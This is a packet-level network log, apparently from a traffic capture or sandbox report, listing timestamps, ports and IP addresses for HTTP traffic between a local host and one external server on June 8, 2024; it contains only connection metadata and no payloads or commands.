Jun 8, 2024 20:22:06.441597939 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.441605091 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.441617012 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.441623926 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.441632986 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.441649914 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.441649914 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.441649914 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.441665888 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.441673040 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.441683054 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.441689014 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.441700935 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.441709995 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.441718102 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.441730976 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.441730976 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.441755056 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.442265034 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.442281961 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.442297935 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.442313910 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.442326069 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.442326069 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.442329884 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.442353964 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.442353964 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.442374945 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.442414045 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.442430019 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.442445040 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.442461967 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.442467928 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.442478895 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.442495108 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.442495108 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.442496061 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.442513943 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.442516088 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.442529917 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.442540884 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.442542076 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.442548037 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.442564964 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.442567110 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.442567110 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.442580938 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.442596912 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.442598104 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.442616940 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.442641973 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.442641973 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.443324089 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.443339109 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.443355083 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.443370104 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.443382978 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.443388939 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.443403959 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.443406105 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.443423986 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.443423986 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.443439960 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.443449974 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.443449974 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.443459034 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.443470001 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.443478107 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.443495989 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.443495989 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.443495989 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.443511963 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.443516016 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.443528891 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.443540096 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.443547010 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.443561077 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.443562984 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.443581104 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.443587065 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.443587065 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.443597078 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.443607092 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.443631887 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.443631887 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.444247007 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.444263935 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.444279909 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.444295883 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.444300890 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.444312096 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.444323063 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.444330931 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.444346905 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.444364071 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.444365978 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.444365978 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.444365978 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.444381952 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.444391966 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.444400072 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.444416046 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.444417953 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.444417953 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.444432974 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.444447994 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.444448948 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.444464922 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.444488049 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.444500923 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.444500923 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.444500923 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.444500923 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.444509983 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.444530964 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.444566965 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.445076942 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.445094109 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.445110083 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.445126057 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.445141077 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.445142984 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.445142984 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.445158005 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.445163965 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.445188999 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.445188999 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.445209026 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.445223093 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.445240974 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.445256948 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.445272923 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.445281029 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.445288897 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.445303917 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.445307016 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.445323944 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.445323944 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.445341110 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.445349932 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.445349932 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.445358038 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.445370913 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.445370913 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.445374966 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.445391893 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.445405006 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.445408106 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.445425034 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.445429087 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.445456028 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.445456028 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.445485115 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.446082115 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.446099043 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.446115017 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.446130991 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.446146011 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.446146011 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.446146965 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.446163893 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.446172953 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.446172953 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.446181059 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.446197033 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.446197033 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.446198940 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.446216106 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.446221113 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.446233034 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.446240902 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.446249008 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.446255922 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.446266890 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.446273088 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.446283102 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.446293116 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.446300983 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.446310997 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.446316957 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.446335077 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.446336031 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.446336031 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.446372986 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.446372986 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.446680069 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.446696043 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.446719885 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.446734905 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.446734905 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.446749926 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.446762085 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.446762085 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.446767092 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.446784019 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.446784973 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.446784019 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.446801901 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.446819067 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.446826935 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.446835995 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.446849108 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.446849108 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.446854115 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.446871042 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.446878910 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.446878910 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.446887970 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.446898937 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.446906090 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.446914911 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.446922064 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.446933031 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.446938038 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.446953058 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.446955919 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.446973085 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.446974039 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.446993113 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.446993113 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.447010040 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.447017908 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.447019100 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.447053909 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.447053909 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.447702885 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.447719097 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.447734118 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.447750092 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.447762012 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.447767973 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.447782993 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.447784901 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.447803020 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.447812080 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.447822094 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.447833061 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.447848082 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.447848082 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.447849035 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.447866917 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.447879076 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.447881937 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.447897911 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.447921991 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.447921991 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.546852112 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.546924114 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.546960115 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.546993971 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.547028065 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.547082901 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.547120094 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.547142029 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.547142029 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.547142982 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.547153950 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.547188997 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.547219992 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.547254086 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.547290087 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.547311068 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.547311068 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.547311068 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.547311068 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.547311068 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.547311068 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.547328949 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.547357082 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.547364950 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.547382116 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.547400951 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.547422886 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.547446966 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.547461033 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.547492027 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.547514915 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.547525883 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.547548056 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.547560930 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.547576904 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.547595978 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.547616959 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.547631025 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.547661066 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.547666073 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.547702074 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.547708988 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.547708988 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.547758102 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.547856092 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.547889948 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.547910929 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.547924042 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.547935963 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.547960043 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.547980070 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.547993898 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.548012972 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.548029900 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.548048973 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.548064947 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.548085928 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.548099041 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.548125029 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.548134089 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.548149109 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.548171043 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.548192024 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.548226118 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.548413992 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.548450947 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.548472881 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.548511028 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.548516989 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.548554897 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.548576117 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.548588991 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.548614025 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.548621893 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.548659086 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.548669100 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.548669100 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.548692942 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.548711061 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.548726082 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.548751116 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.548755884 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.548769951 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.548789978 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.548810959 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.548847914 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.548985004 CEST	80	49731	23.88.106.134	192.168.2.4
